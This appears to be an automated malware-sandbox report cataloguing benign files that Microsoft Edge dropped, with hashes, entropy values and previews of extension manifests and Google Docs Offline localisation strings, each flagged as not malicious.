                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
